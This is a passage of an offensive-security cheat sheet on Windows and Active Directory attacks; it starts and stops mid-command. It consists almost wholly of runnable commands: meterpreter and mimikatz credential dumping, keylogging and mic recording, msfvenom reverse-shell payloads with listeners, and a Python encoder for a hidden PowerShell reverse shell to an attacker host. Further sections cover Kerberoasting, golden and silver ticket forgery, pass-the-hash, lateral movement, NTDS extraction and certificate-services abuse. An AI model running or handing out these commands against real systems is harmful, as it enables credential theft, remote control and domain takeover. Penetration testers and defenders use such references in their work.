"<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }' // network scan meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded' // port scan meterpreter > load kiwi // load mimikatz meterpreter > help kiwi // mimikatz help meterpreter > kiwi_cmd // execute mimikatz native command meterpreter > lsa_dump_sam // lsa sam dump meterpreter > dcsync_ntlm krbtgt // dc sync meterpreter > creds_all // dump all credentials meterpreter > creds_msv // msv dump meterpreter > creds_kerberos // kerberos dump meterpreter > creds_ssp // ssp dump meterpreter > creds_wdigest // wdigest dump meterpreter > getprivs // get privileges after loading mimikatz meterpreter > getsystem // gain system privileges if user is member of administrator group meterpreter > hashdump // dumps all the user hashes meterpreter > run post/windows/gather/checkvm // check status of the target meterpreter > run post/multi/recon/local_exploit_suggester // checking for exploits meterpreter > run post/windows/manage/enable_rdp // enables rdp meterpreter > run post/multi/manage/autoroute // runs autoroutes meterpreter > run auxiliary/server/socks4a // runs socks4 proxy server meterpreter > keyscan_start // enabled keylogger meterpreter > keyscan_dump // showing the output meterpreter > screenshare // realtime screen sharing meterpreter > screenshare -q 100 // realtime screen sharing meterpreter > record_mic // recording mic output meterpreter > timestomp // modify timestamps meterpreter > execute -f calc.exe // starts a program on the victim meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1 // port forwarding ``` ##### Metasploit through Proxychains ```shell proxychains -q msfconsole ``` ##### Auxiliary Output Directory ```shell /home/<USERNAME>/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt ``` ##### Meterpreter Listener ###### Generate Payload ```shell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe ``` ###### Setup Listener for Microsoft Windows ```shell msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST <LHOST> LHOST => <LHOST> msf6 exploit(multi/handler) > set LPORT <LPORT> LPORT => <LPORT> msf6 exploit(multi/handler) > run ``` ###### Download Files ```shell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe ``` ```shell msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST <LHOST> LHOST => <LHOST> msf6 exploit(multi/handler) > set LPORT <LPORT> LPORT => <LPORT> msf6 exploit(multi/handler) > run ``` ```cmd .\<FILE>.exe ``` ```shell meterpreter > download * ``` ### Post Exploitation #### Account Operators Group Membership ##### Add User ```cmd net user <USERNAME> <PASSWORD> /add /domain net group "Exchange Windows Permissions" /add <USERNAME> ``` ##### Import PowerView ```cmd powershell -ep bypass . .\PowerView.ps1 ``` ##### Add DCSync Rights ```cmd $pass = convertto-securestring '<PASSWORD>' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $pass) Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=<DOMAIN>,DC=<DOMAIN>" -PrincipalIdentity <USERNAME> -Rights DCSync ``` ##### DCSync ```shell impacket-secretsdump '<USERNAME>:<PASSWORD>@<RHOST>' ``` #### Active Directory ##### Manual Enumeration ```cmd net user /domain net user <USERNAME> /domain net group /domain net group "<GROUP>" /domain Get-NetComputer Get-NetComputer | select operatingsystem,dnshostname Find-LocalAdminAccess Get-NetSession -ComputerName <RHOST> Get-NetSession -ComputerName <RHOST> -Verbose Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion ``` ##### Enumeration using PowerView ```cmd powershell -ep bypass . .\PowerUp.ps1 Get-NetDomain Get-NetUser Get-NetUser | select cn Get-NetUser | select cn,pwdlastset,lastlogon Get-NetGroup | select cn Get-NetGroup "<GROUP>" | select member Convert-SidToName S-1-5-21-1987370373-658406905-1781884369-1104 ``` ##### Service Principal Name (SPN) Enumeration ```cmd setspn -L iis_service Get-NetUser -SPN | select samaccountname,serviceprincipalname nslookup.exe <RHOST> ``` ##### Object Permission Enumeration | Permission | Description | | --- | --- | | GenericAll | Full permissions on object | | GenericWrite | Edit certain attributes on the object | | WriteOwner | Change ownership of the object | | WriteDACL | Edit ACE's applied to object | | AllExtendedRights | Change password, reset password, etc. | | ForceChangePassword | Password change for object | | Self (Self-Membership) | Add ourselves to for example a group | ```cmd Get-ObjectAcl -Identity <USERNAME> Get-ObjectAcl -Identity "<GROUP>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights Get-NetGroup "<GROUP>" | select member net group "<GROUP>" <USERNAME> /add /domain net group "<GROUP>" <USERNAME> /del /domain ``` ##### Share Enumeration ```cmd Find-DomainShare ls \\<RHOST>\sysvol\<DOMAIN>\ ls \\<RHOST>\sysvol\<DOMAIN>\Policies\ cat \\<RHOST>\sysvol\<DOMAIN>\Policies\oldpolicy\old-policy-backup.xml gpp-decrypt "+bsY0V3d4/KgX3VJdO/vgepPfsN1zMFTiQuyApgR92JE" ``` ##### Credential Harvesting ###### Cached Credentials ```cmd .\mimikatz.exe mimikatz # sekurlsa::logonpasswords dir \\<RHOST>\<SHARE> mimikatz # sekurlsa::tickets ``` ###### AS-REP Roasting ```shell impacket-GetNPUsers -dc-ip <RHOST> -request -outputfile hashes.asreproast <DOMAIN>/<USERNAME> hashcat -m 18200 hashes.asreproast /PATH/TO/WORDLIST/<WORDLIST> -r /usr/share/hashcat/rules/best64.rule --force ``` ```cmd .\Rubeus.exe asreproast /nowrap hashcat -m 18200 hashes.asreproast2 /PATH/TO/WORDLIST/<WORDLIST> -r /usr/share/hashcat/rules/best64.rule --force ``` ###### Kerberoasting ```shell impacket-GetUserSPNs -dc-ip <RHOST> -request <DOMAIN>/<USERNAME> hashcat -m 13100 hashes.kerberoast /PATH/TO/WORDLIST/<WORDLIST> -r /usr/share/hashcat/rules/best64.rule --force ``` ```cmd .\Rubeus.exe kerberoast /outfile:hashes.kerberoast hashcat -m 13100 hashes.kerberoast2 /PATH/TO/WORDLIST/<WORDLIST> -r /usr/share/hashcat/rules/best64.rule --force ``` ###### Silver Tickets ###### Prerequisites - SPN password hash - Domain SID - Target SPN ###### Silver Ticket Forgery ```cmd iwr -UseDefaultCredentials http://<RHOST> .\mimikatz.exe mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords // NTLM: 4d28cf5252d39971419580a51484ca09 whoami /user // SID: S-1-5-21-1987370270-658905905-1781884369-1105 (S-1-5-21-1987370270-658905905-1781884369) mimikatz # kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:<DOMAIN> /ptt /target:<RHOST> /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:<USERNAME> klist iwr -UseDefaultCredentials http://<RHOST> ``` ###### Domain Controller Syncronization (DCSync) ###### Prerequisites - Replicating Directory Changes - Replicating Directory Changes All - Replicating Directory Changes in Filtered ###### Domain Controller Synchonization Execution ```cmd .\mimikatz.exe mimikatz # lsadump::dcsync /user:<DOMAIN>\<USERNAME> mimikatz # lsadump::dcsync /user:<DOMAIN>\Administrator hashcat -m 1000 <FILE> /PATH/TO/WORDLIST/<WORDLIST> -r /usr/share/hashcat/rules/best64.rule --force ``` ```shell impacket-secretsdump -just-dc-user <USERNAME> <DOMAIN>/<USERNAME>:"<PASSWORD>"@<RHOST> ``` ##### Lateral Movement ###### Windows Management Instrumentation (WMI) ###### Spawning Process ```cmd wmic /node:<RHOST> /user:<USERNAME> /password:<PASSWORD> process call create "cmd" ``` ###### Store Credentials ```cmd $username = '<USERNAME>'; $password = '<PASSWORD>'; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; ``` ###### Instanciate Distributed Component Object MOdel (DCOM) ```cmd $options = New-CimSessionOption -Protocol DCOM $session = New-Cimsession -ComputerName <RHOST> -Credential $credential -SessionOption $Options $command = 'cmd'; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command}; ``` ###### Creating Payload ###### revshell_encoder.py ```python import sys import base64 payload = '$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode() print(cmd) ``` ###### Payload Encoding ```shell python3 encode.py ``` ```cmd powershell -nop -w hidden -e JAB<--- SNIP --->CkA ``` ###### Execution ```cmd $username = '<USERNAME>'; $password = '<PASSWORD>'; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; $options = New-CimSessionOption -Protocol DCOM $session = New-Cimsession -ComputerName <RHOST> -Credential $credential -SessionOption $Options $command = 'powershell -nop -w hidden -e JAB<--- SNIP --->CkA'; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command}; ``` ###### Windows Remote Shell (WinRS) ###### Prerequisites - User needs to be part of the Administrators or Remote Management Users group on the target host ###### Execution ```cmd winrs -r:<RHOST> -u:<USERNAME> -p:<PASSWORD> "cmd /c hostname & whoami" winrs -r:<RHOST> -u:<USERNAME> -p:<PASSWORD> "powershell -nop -w hidden -e JAB<--- SNIP --->CkA" ``` ###### PowerShell ```cmd $username = '<USERNAME>'; $password = '<PASSWORD>'; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; New-PSSession -ComputerName <RHOST> -Credential $credential Enter-PSSession 1 ``` ###### PsExec ```cmd .\PsExec64.exe -i \\<RHOST> -u <DOMAIN>\<USERNAME> -p <PASSWORD> cmd ``` ###### Pass the Hash (PtH) ```shell impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@<RHOST> ``` ###### Overpass the Hash ```cmd .\mimikatz.exe mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::pth /user:<USERNAME> /domain:<DOMAIN> /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell klist dir \\<RHOST>\<SHARE> klist .\PsExec.exe \\<RHOST> cmd ``` ###### Pass the Ticket ###### Prerequisites - Export an already existing ticket of a user ###### Exporting the Ticket ```cmd .\mimikatz.exe mimikatz # privilege::debug mimikatz #sekurlsa::tickets /export dir *.kirbi mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-<USERNAME>@cifs-<RHOST>.kirbi klist .\PsExec.exe \\<RHOST> cmd ``` ###### Distributed Component Object Model (DCOM) ###### Prerequisites - Elevated PowerShell session ###### Creating and storing the Distributed Component Object Model ```cmd $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<RHOST>")) $dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c cmd","7") tasklist | findstr "cmd" $dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JAB<--- SNIP --->CkA","7") ``` ##### Active Directory Persistence ###### Golden Tickets ###### Prerequisites - Hash of krbtgt ###### Forge and Inject Golden Ticket ```cmd .\mimikatz.exe mimikatz # privilege::debug mimikatz # lsadump::lsa /patch mimikatz # kerberos::purge mimikatz # kerberos::golden /user:<USERNAME> /domain:<DOMAIN> /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt mimikatz # misc::cmd ``` ###### Execution Use the `hostname` and not the `IP address` because otherwise it would authenticate via `NTLM` and the access would still be blocked. ```cmd .\PsExec.exe \\<RHOST> cmd ``` ###### Volume Shadow Service (VSS) aka Shadow Copies > https://developer.microsoft.com/en-us/windows/downloads/windows-sdk/ ###### Create and collect necessary Files ```cmd vshadow.exe -nw -p C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit C:\ntds.dit.bak reg.exe save hklm\system C:\system.bak impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL ``` #### Active Directory Certificate Services (AD CS) ```shell certipy-ad find -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -dc-ip <RHOST> -vulnerable -stdout ``` ##### ESC1: Misconfigured Certificate Templates ```shell certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -target '<CA>' -template '<TEMPLATE>' -upn 'Administrator@<DOMAIN>' -dns <RHOST> certipy-ad auth -pfx Administrator.pfx -dc-ip <RHOST> ``` ##### ESC2: Misconfigured Certificate Templates ```shell certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -target '<CA>' -template '<TEMPLATE>' certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -target '<CA>' -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx certipy-ad auth -pfx Administrator.pfx -dc-ip <RHOST> ``` ##### ESC3: Enrollment Agent Templates ```shell certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -target '<CA>' -template '<TEMPLATE>' certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -target '<CA>' -template User -on-behalf-of '<DOMAIN>\Administrator' -pfx <USERNAME>.pfx certipy-ad auth -pfx Administrator.pfx -dc-ip <RHOST> ``` ##### ESC4: Vulnerable Certificate Template Access Control ```shell certipy-ad template -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -template '<TEMPLATE>' -save-old certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -target <RHOST> -template '<TEMPLATE>' -upn 'Administrator@<DOMAIN>' $ certipy-ad auth -pfx Administrator.pfx -dc-ip <RHOST> ``` or ```shell certipy-ad template -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -template '<TEMPLATE>' -save-old certipy-ad req -ca '<CA>' -u '<USERNAME>@<DOMAIN>' -p '<PASSWORD>' -dc-ip <RHOST> -template '<TEMPLATE>' -target <RHOST> -upn 'Administrator@<DOMAIN>' -debug certipy-ad auth -pfx Administrator.pfx -dc-ip <RHOST> ``` ##### ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 ```shell certipy-ad find -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -dc-ip <RHOST> -vulnerable -stdout certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -target '<CA>' -template User -upn 'Administrator@<DOMAIN>' certipy-ad req -ca '<CA>' -username 'Administrator@<DOMAIN>' -password '<PASSWORD>' -target '<CA>' -template User -upn 'Administrator@<DOMAIN>' certipy-ad auth -pfx Administrator.pfx -dc-ip <RHOST> ``` ##### ESC7: Vulnerable Certificate Authority Access Control ```shell certipy-ad ca -ca '<CA>' -add-officer '<USERNAME>' -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' certipy-ad ca -ca '<CA>' -enable-template SubCA -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -target '<CA>' -template SubCA -upn 'Administrator@<DOMAIN>' certipy-ad ca -ca '<CA>' -issue-request <ID> -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -target '<CA>' -retrieve <ID> certipy-ad auth -pfx Administrator.pfx -dc-ip <RHOST> ``` ##### ESC8: NTLM Relay to AD CS HTTP Endpoints ```shell certipy-ad relay -target 'http://<CA>' certipy-ad relay -ca '<CA>' -template '<TEMPLATE>' python3 PetitPotam.py <RHOST> <DOMAIN> certipy-ad auth -pfx dc.pfx -dc-ip <RHOST> export KRB5CCNAME=dc.ccache impacket-secretsdump -k -no-pass <DOMAIN>/<RHOST>@<DOMAIN> ``` ###### Coercing ```shell impacket-ntlmrelayx -t http://<RHOST>/certsrv/certfnsh.asp -smb2support --adcs --template <TEMPLATE> python3 PetitPotam.py <RHOST> <DOMAIN> python3 gettgtpkinit.py -pfx-base64 $(cat base64.b64) '<DOMAIN>'/'<RHOST>' 'dc.ccache' export KRB5CCNAME=dc.ccache impacket-secretsdump -k -no-pass <DOMAIN>/<RHOST>@<DOMAIN> ``` ##### ESC9: No Security Extensions ```shell certipy-ad shadow auto -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -account '<USERNAME>' certipy-ad account update -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -user '<USERNAME>' -upn 'Administrator@<DOMAIN>' certipy-ad req -ca '<CA>' -username '<USERNAME>' -hashes '<HASH>' -template '<TEMPLATE>' certipy-ad account update -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -user '<USERNAME>' -upn '<USERNAME>@<DOMAIN>' certipy-ad auth -pfx Administrator.pfx -domain '<DOMAIN>' ``` or ```shell certipy-ad shadow auto -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -account '<USERNAME>' certipy-ad account update -username '<USERNAME>@<DOMAIN>' -hashes '<HASH>' -user '<USERNAME>' -upn 'Administrator@<DOMAIN>' certipy-ad req -ca '<CA>' -username '<USERNAME>' -password '<PASSWORD>' -template '<TEMPLATE>' certipy-ad account update -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -user '<USERNAME>' -upn '<USERNAME>@<DOMAIN>' certipy-ad auth -pfx Administrator.pfx -domain '<DOMAIN>' ``` ###### Alternative via Computer Object and Email ```shell bloodyAD --host <RHOST> --dc-ip <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> add computer '<USERNAME>' '<PASSWORD>' ``` ```shell certipy-ad account update -username '<USERNAME>@<DOMAIN>' -p '<PASSWORD>' -user '<USERNAME>' -upn '<USERNAME>@<DOMAIN>' ``` ```shell bloodyAD --host <RHOST> --dc-ip <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> add genericAll 'OU=<OU>,DC=<DOMAIN>,DC=<DOMAIN>' '<USERNAME>' ``` ```shell bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> set object <USERNAME> mail -v <EMAIL> ``` ```shell certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -hashes '<HASH>' -template '<TEMPLATE>' ``` ```shell certipy-ad auth -pfx <FILE>.pfx -domain '<DOMAIN>' -username '<USERNAME>@<DOMAIN>' ``` ##### ESC10: Weak Certificate Mappings ###### Case 1 ```shell certipy-ad shadow auto -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -account '<USERNAME>' certipy-ad account update -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -user '<USERNAME>' -upn 'Administrator@<DOMAIN>' certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -hashes '<HASH>' certipy-ad account update -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -user '<USERNAME>' -upn '<USERNAME>@<DOMAIN>' certipy-ad auth -pfx Administrator.pfx -domain '<DOMAIN>' ``` ###### Case 2 ```shell certipy-ad shadow auto -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -account '<USERNAME>' certipy-ad account update -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -user '<USERNAME>' -upn '<RHOST>@<DOMAIN>' certipy-ad req -ca 'CA' -username '<USERNAME>@<DOMAIN>' -password -hashes '<HASH>' certipy-ad account update -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -user '<USERNAME>' -upn '<USERNAME>@<DOMAIN>' certipy-ad auth -pfx dc.pfx -dc-ip '<RHOST>' -ldap-shell ``` ##### ESC11: IF_ENFORCEENCRYPTICERTREQUEST ```shell certipy-ad relay -target 'rpc://<CA>' -ca 'CA' certipy-ad auth -pfx administrator.pfx -domain '<DOMAIN>' ``` ##### ESC14: altSecurityIdentities ###### ESC14 Scenario B: Target with X509RFC822 (email) ```shell python3 entry.py find -u '<USERNAME>@<DOMAIN>' -hashes ':<HASH>' -dc-ip <RHOST> -esc14 -vulnerable -stdout -debug ``` ```cmd Set-ADUser -Identity <USERNAME> -Add @{'altSecurityIdentities'='X509:<RFC822>[email protected]'} ``` ```shell bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> set object <USERNAME> mail -v [email protected] ``` ```shell certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -hashes '<HASH>' -template '<TEMPLATE>' ``` ```shell certipy-ad auth -pfx <FILE>.pfx -domain '<DOMAIN>' -username '<USERNAME>' ``` #### ADCSTemplate ```cmd Import-Module .\ADCSTemplate.psm1 New-ADCSTemplate -DisplayName TopCA -JSON (Export-ADCSTemplate -DisplayName 'Subordinate Certification Authority') -AutoEnroll -Publish -Identity '<DOMAIN>\Domain Users' ``` #### ADMiner ```shell AD-miner -u <USERNAME> -p <PASSWORD> -cf <NAME> ``` #### BloodHound ```shell sudo apt-get install openjdk-11-jdk pip install bloodhound sudo apt-get install neo4j sudo apt-get install bloodhound ``` ##### Installing and starting Database ```shell wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add - sudo echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list sudo apt-get update sudo apt-get install apt-transport-https sudo apt-get install neo4j systemctl start neo4j ./bloodhound --no-sandbox ``` > http://localhost:7474/browser/ ###### Docker Container ```shell docker run -itd -p 7687:7687 -p 7474:7474 --env NEO4J_AUTH=neo4j/<PASSWORD> -v $(pwd)/neo4j:/data neo4j:4.4-community ``` ##### Database Password Reset > http://localhost:7474/browser/ ```shell ALTER USER neo4j SET PASSWORD '<PASSWORD>' ``` #### BloodHound Python ```shell bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns '<RHOST>' -c all --zip bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns '<RHOST>' -c all --zip --dns-timeout 30 bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -gc '<DOMAIN>' -ns '<RHOST>' -c all --zip bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -ns '<RHOST>' --dns-tcp -no-pass -c all --zip bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns '<RHOST>' --dns-tcp -no-pass -c all --zip ``` #### bloodyAD > https://github.com/CravateRouge/bloodyAD/wiki/User-Guide > https://github.com/CravateRouge/bloodyAD/wiki/Access-Control ```shell bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> get children 'DC=<DOMAIN>,DC=<DOMAIN>' --type user // Get all users of the domain bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> get children 'DC=<DOMAIN>,DC=<DOMAIN>' --type computer // Get all computers of the domain bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> get children 'DC=<DOMAIN>,DC=<DOMAIN>' --type container // Get all containers of the domain bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> get dnsDump // Get AD DNS records bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> get object Users --attr member // Get group members bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> get object 'DC=<DOMAIN>,DC=<DOMAIN>' --attr msDS-Behavior-Version // Get AD functional level bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> get object 'DC=<DOMAIN>,DC=<DOMAIN>' --attr minPwdLength // Get minimum password length policy bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> get object 'DC=<DOMAIN>,DC=<DOMAIN>' --attr ms-DS-MachineAccountQuota // Read quota for adding computer objects to domain bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> get object '<USERNAME>' --attr userAccountControl // Get UserAccountControl flags bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> get object '<ACCOUNTNAME>$' --attr ms-Mcs-AdmPwd // Read LAPS password bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> get object '<ACCOUNTNAME>$' --attr msDS-ManagedPassword // Read GMSA account password bloodyAD --host <RHOST> --dc-ip <RHOST> -d <DOMAIN> -k get object '<ACCOUNTNAME>$' --attr msDS-ManagedPassword // Read GMSA account password using Kerberos bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> set password '<USERNAME>' '<PASSWORD>' --kerberos --dc-ip <RHOST> // Set a password for a user bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> set object '<USERNAME>' servicePrincipalName // Set a Service Principal Name (SPN) bloodyAD --host <RHOST> --dc-ip <RHOST> -d <DOMAIN> -k set object '<USERNAME>' servicePrincipalName // Set a Service Principal Name (SPN) using Kerberos bloodyAD --host <RHOST> --dc-ip <RHOST> -d <DOMAIN> -k set object '<USERNAME>' servicePrincipalName -v 'cifs/<USERNAME>' // Set a Service Principal Name (SPN) using Kerberos bloodyAD --host <RHOST> --dc-ip <RHOST> -d <DOMAIN> -u <USERNAME> -k set object '<USERNAME>' altSecurityIdentities -v 'X509:<UPN=<USERNAME>@<DOMAIN>>/CN=<CN>' // Set a email address within a certificate bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> add groupMember '<GROUP>' '<USERNAME>' // Add user to a group bloodyAD --host <RHOST> --dc-ip <RHOST> -d <DOMAIN> -k add groupMember '<GROUP>' '<USERNAME>' // Add user to a group using Kerberos bloodyAD --host <RHOST> --dc-ip <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> add computer '<USERNAME>' '<PASSWORD>' // Add a computer object on behalf of a user bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> add dnsRecord <RECORD> <LHOST> // Add a new DNS entry bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> add uac '<USERNAME>' DONT_REQ_PREAUTH // Enable DONT_REQ_PREAUTH for ASREPRoast bloodyAD --host <RHOST> --dc-ip <RHOST> -d <DOMAIN> -k add uac '<USERNAME>' -f DONT_REQ_PREAUTH // Enable DONT_REQ_PREAUTH for ASREPRoast using Kerberos bloodyAD --host <RHOST> --dc-ip <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> add genericAll 'OU=<OU>,DC=<DOMAIN>,DC=<DOMAIN>' '<USERNAME>' // Add genericAll permissions to a specific OU bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> remove dnsRecord <RECORD> <LHOST> // Remove a DNS entry bloodyAD --host <RHOST> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> remove uac '<USERNAME>' ACCOUNTDISABLE // Disable ACCOUNTDISABLE (enable account) bloodyAD --host <RHOST> --dc-ip <RHOST> -d <DOMAIN> -k remove uac '<USERNAME>' -f ACCOUNTDISABLE // Disable ACCOUNTDISABLE (enable account) using Kerberos ``` #### Certify > https://github.com/GhostPack/Certify ```cmd Certify.exe find /vulnerable Certify.exe find /vulnerable /currentuser ``` #### Certipy > https://github.com/ly4k/Certipy > https://github.com/ly4k/BloodHound/ ```shell certipy-ad find -u '<USERNAME>@<DOMAIN>' -p '<PASSWORD>' -dc-ip <RHOST> certipy-ad find -u '<USERNAME>' -p '<PASSWORD>' -dc-ip <RHOST> -vulnerable -stdout ``` ##### Account Creation ```shell certipy-ad account create -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -dc-ip <RHOST> -dns <RHOST> -user '<COMPUTERNAME>' ``` ##### Authentication ```shell certipy-ad auth -u '<USERNAME>' -pfx <FILE>.pfx -dc-ip <RHOST> -domain '<DOMAIN>' ``` ###### LDAP-Shell ```shell certipy-ad auth -u '<USERNAME>' -pfx <FILE>.pfx -dc-ip <RHOST> -domain '<DOMAIN>' -ldap-shell ``` ```shell # add_user <USERNAME> # add_user_to_group <GROUP> ``` ##### Certificate Forging ```shell certipy-ad template -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -dc-ip <RHOST> -template '<TEMPLATE>' -save-old ``` ##### Certificate Request Run the following command twice because of a current issue with `certipy`. ```shell certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -dc-ip <RHOST> -target '<FQDN>' -template '<TEMPLATE>' ``` ```shell certipy-ad req -ca '<CA>' -username '<USERNAME>@<DOMAIN>' -password '<PASSWORD>' -dc-ip <RHOST> -target '<FQDN>' -template '<TEMPLATE>' -upn '<USERNAME>@<DOMAIN>' -dns '<FQDN>' certipy-ad req -ca '<CA>' 